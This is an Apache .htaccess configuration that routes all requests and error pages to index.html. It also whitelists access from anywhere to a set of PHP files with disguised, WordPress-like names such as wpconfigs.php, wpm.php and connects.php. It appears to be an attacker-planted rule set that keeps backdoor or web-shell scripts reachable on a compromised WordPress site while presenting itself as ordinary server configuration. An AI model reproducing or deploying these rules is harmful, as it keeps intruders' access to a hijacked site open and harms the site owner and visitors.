DirectoryIndex index.html index.htm index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.html$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.html [L]
ErrorDocument 403 /index.html
ErrorDocument 404 /index.html
</IfModule>
<FilesMatch "^(wpconfigs\.php|wp\-cache\.php|class\-wp\.php|wp\-tmp\.php|wpm\.php|inputs\.php|wpconfigs.php|wpm.php|siteheads.php|connects.php)$">
Order Allow,Deny
Allow from all
Satisfy Any
</FilesMatch>
